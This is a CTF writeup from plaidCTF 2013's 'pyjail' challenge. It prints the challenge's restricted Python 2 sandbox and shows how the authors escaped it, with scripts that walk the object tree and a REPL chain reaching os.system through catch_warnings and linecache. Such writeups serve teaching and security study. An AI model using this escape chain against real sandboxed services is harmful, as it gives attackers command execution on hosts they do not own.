plaidCTF 2013 "pyjail" Writeup - Part I: Breaking the Sandbox

Mon 22 April 2013 by Javex

Note

This is part one of the two part process describing how we broke the pyjail challenge on plaidCTF 2013. The second part is written by qll and covers the nonalpha stuff. This first part covers how to escape the sandbox.

The pyjail challenge was one of the toughest ones us pythong guys had to do. When we first saw it, we thought it would be a walk in the park, since the author tributed two of our Hack.lu 2012 challenges. Since one of the authors was available this weekend we assume it wouldn't be too hard to break. We were wrong. It took us at least three people and several hours to come up with a solution.

In this article I will describe how we exploited the sandbox and how it probably was not what the author intended (based on the comments/hints we had). First of all, the source code:

Note

Update: We seem to have found the intended solution (see Ryan's comment below).

#!/usr/bin/python -u
'''
This challenge is a tribute to 'python jail' and 'The Sandboxed Terminal'
from Hack.lu 2012's CTF by Fluxfingers. Oh python, why you so why you so.

You should read some writeups on these (e.g. at ctftime.org/task/124/ and
ctftime.org/task/130/). You'll want to use a similar strategies to both
get past the character restrictions (e.g. `x`==repr(x) and True+True==2)
and to get past the sandboxing (e.g. the except handler below)
'''

from sys import modules
modules.clear()
del modules

_raw_input = raw_input
_eval = eval
ident = ''.join((chr(i) for i in xrange(256)))

#TIL: the interactive interpreter freaks if 'True' gets undefined,
#and 'None' is actually a keyword pretending to be a variable.
__builtins__.__dict__.clear()
__builtins__ = None

print 'Get a shell. The flag is NOT in ./key, ./flag, etc.'

while 1:
  try:
    inp = _raw_input()
    if not inp: continue
    inp = inp.split()[0][:1900]
    #Dick move: you also have to only use the characters that my solution did.
    inp = inp.translate(ident, '!"#$&*+-/0123456789;=>[email protected]\\^abcdefghijklmnopqrstuvwxyz|')
    a = None
    exec 'a=' + _eval(inp, {}) in {}
    print 'Return Value:', a
  except ().__class__.__bases__[0].__subclasses__()[42].__subclasses__()[0], e: #42 is base exception.
    if e.__str__().startswith('EOF'): raise e
    else: print 'Exception:', e

Let's examine them one by one. First of all, all currently loaded modules are removed:

from sys import modules
modules.clear()
del modules

In the next step a backup of two required functions is made and all other functions are "removed" from the environment:

_raw_input = raw_input
_eval = eval
__builtins__.__dict__.clear()
__builtins__ = None

Note that I will not cover anything related to nonalpha, so we will just pretend that there is no such filtering for this part. The nonalpha part is completely independent of it so it makes it a lot easier to not put this boundary in for us.

Those of you that are familiar with our earlier challenges (one of which was inspired by yet another challenge) might remeber that you could open a file easily through walking the object tree. If you don't, read writeups on The Sandboxed Terminal and python jail. I will not cover the basics of this technique to keep the article short.

But our goal is to get a shell so opening a file would not yield any desired result. We tried to mess around with ttys and other ideas of how opening a file might yield command exec. We also examined every object or class that we could find by doing ().__class__.__base__.__subclasses__().

At this point you have to ask yourself How would you get a python shell when you have no restrictions? There are some possibilities here but the simplest that comes to mind (for me) is os.system. However, we cannot do anything with __import__ or reload because they were removed.

I am going to skip ahead here. The technique I am going to describe took us several tries and hours to develop but the process in-between is pretty boring with poking at different non-working attempts.

One of the cooler ideas that didn't work was actually thinking at bytecode level: Those functions that are implemented in Python (and not CPython) have a __code__ attribute which you could load and execute. We didn't find any worthy modules in the end which is also related to the fact that the globals this bytecode is referencing are probably non-existent. We didn't pursue it further from here, but maybe it even would have worked.

Finally, we decided to search for all objects that we could get our hands on. The way we did this was walk the object tree extracing all object we could get and them spitting them out. Looking through these objects might give a useful hint on where to go next.

For this, a script was needed that has almost the same restrictions as the challenge, but we will need some utility functions as a backup to make our algorithm work. Thus, the preparation in our script looks like this:

_set = set
_list = list
_str = repr
_hasattr = hasattr
from sys import modules
modules.clear()
del modules

__builtins__.__dict__.clear()
__builtins__ = None

Getting all we could find is a three-step process:

  1. Find all subclasses
  2. Inside all subclasses look for anything we might want
  3. Filter this list for something we need, e.g. os

Step one is very easy:

def get_subs(c):
    subs = _set(c.__subclasses__())
    for sub in subs:
        if sub in subs:
            continue
        sub += get_subs(c)
    return subs

You can call it with get_subs([].__class__.mro()[1]) which is actually just <type 'object'>. We get back a list of distinct subclasses that were searched recursively.

Step two needs some explanation first: Every function in Python has access to local and global variables and also some closures. I will not go into detail here, but all global variables accessible by a function can be found in func.func_globals which is a dict if such globals exist. Among those globals will be loaded modules that the function has access to. Here I have to admit I do not know how it works exactly because some of those globals were actually removed by our initialization above, but you could see in the result that this was not true for all of them. But don't worry, we don't need to understand, we just need to try it:

def get_func_globals(c):
    subs = _list(get_subs(c))
    gs = _list()
    for sub in subs:
        if _hasattr(sub, '__dict__'):
            for k,v in sub.__dict__.items():
                if _hasattr(v, 'func_globals'):
                    if not _hasattr(v.func_globals, "keys"):
                        continue
                    for fk in v.func_globals.keys():
                        if v.func_globals[fk]:
                            print "%s is not None in %s -> %s" % (fk, k, sub.__name__)
                            if v.func_globals[fk] not in gs:
                                gs.append(v.func_globals[fk])
        if _hasattr(sub, 'func_globals'):
            if not _hasattr(sub.func_globals, "keys"):
                continue
            for fk in sub.func_globals.keys():
                if sub.func_globals[fk]:
                    print "%s is not None in %s" % (fk, sub.__name__)
                    if sub.func_globals[fk] not in gs:
                        gs.append(sub.func_globals[fk])
    print "Globals: %s" % gs
    return gs

Very ugly function but a very simple principle: It looks in every object we got back from our get_subs function for anything in it and in that it looks for the func_globals and there it has to find those which actually have globals. All these globals are saved to a list and also printed so we could directly have a look. This is the output for me:

Container is not None in __call__ -> Callable
MutableMapping is not None in __call__ -> Callable
KeysView is not None in __call__ -> Callable
Callable is not None in __call__ -> Callable
__all__ is not None in __call__ -> Callable
ValuesView is not None in __call__ -> Callable
Mapping is not None in __call__ -> Callable
ABCMeta is not None in __call__ -> Callable
__doc__ is not None in __call__ -> Callable
MappingView is not None in __call__ -> Callable
Hashable is not None in __call__ -> Callable
...
sys is not None in __init__ -> catch_warnings
linecache is not None in __init__ -> catch_warnings
...
formatwarning is not None in __init__ -> catch_warnings
_getaction is not None in __init__ -> catch_warnings
Globals: [<class '_abcoll.Container'>, ..., <function _getaction at 0x7f47c777acf8>]

I have truncated it because the output can be very long. But what you can see here is that we have a long list where even something like sys is avaiable. However, after carefully looking, we did not find a way how sys could be used, so we rather want os. And we want to know how to get it. So for all those global variables we do another iteration: We look in each of their __dict__ variables for the os module:

def check_globs(globs):
    ret = _list()
    for glob in globs:
        if not _hasattr(glob, '__dict__'):
            continue
        for k,v in glob.__dict__.items():
            if k in ['__doc__']:
                continue
            if "os" in _str(v):
                print "%s: %s -> %s" %(glob, k,v)
            ret.append(v)
    return ret

We provide a list of globals from above and parse each of them for their __dict__ attribute. This finally yields:

<module 'sys' (built-in)>: flags -> sys.flags(debug=0, py3k_warning=0, division_warning=0, division_new=0, inspect=0, interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0, ignore_environment=0, tabcheck=0, verbose=0, unicode=0, bytes_warning=0, hash_randomization=0)
<module 'sys' (built-in)>: builtin_module_names -> ('__builtin__', '__main__', '_ast', '_codecs', '_sre', '_symtable', '_warnings', '_weakref', 'errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'pwd', 'signal', 'sys', 'thread', 'xxsubtype', 'zipimport')
<module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>: os -> <module 'os' from '/usr/lib/python2.7/os.pyc'>

Only look at the last line: In linecache there is a module os? Okay where did linecache come from? Looking at the output from above we see that it can be found in catch_warnings.__init__ (its actually in all functions). How do we get catch_warnings? Luckily it is a direct descendant of object. It depends on the environment on which index it is but the pCTF guys were so nice to provide some boxes to ssh to (for other challenges) that had the exact same environment so finding the index was not a problem:

>>> ().__class__.__base__.__subclasses__()[49]
<class 'warnings.catch_warnings'>

Frome here it is easy to build the rest:

>>> ().__class__.__base__.__subclasses__()[49]
<class 'warnings.catch_warnings'>
>>> ().__class__.__base__.__subclasses__()[49].__init__
<unbound method catch_warnings.__init__>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals
{'filterwarnings': <function filterwarnings at 0x7f4da4c87a28>, ..., 'linecache': <module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>, ..., '_getaction': <function _getaction at 0x7f4da4c87cf8>}
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"]
<module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__
{'updatecache': <function updatecache at 0x7f4da4c878c0>, ..., 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, ...}
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__["os"]
<module 'os' from '/usr/lib/python2.7/os.pyc'>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__["os"].system
<built-in function system>

Again, I have shortened the output of some of the longer results. However you can see that in the end we have access to the system function. This was the first break we had: We could escape the sandbox. We encoded this exploit naively: >8000 characters. Certainly too much so we had to work around this. How that worked is the second part of a cool story and for that you should check out qlls writeup.


Comments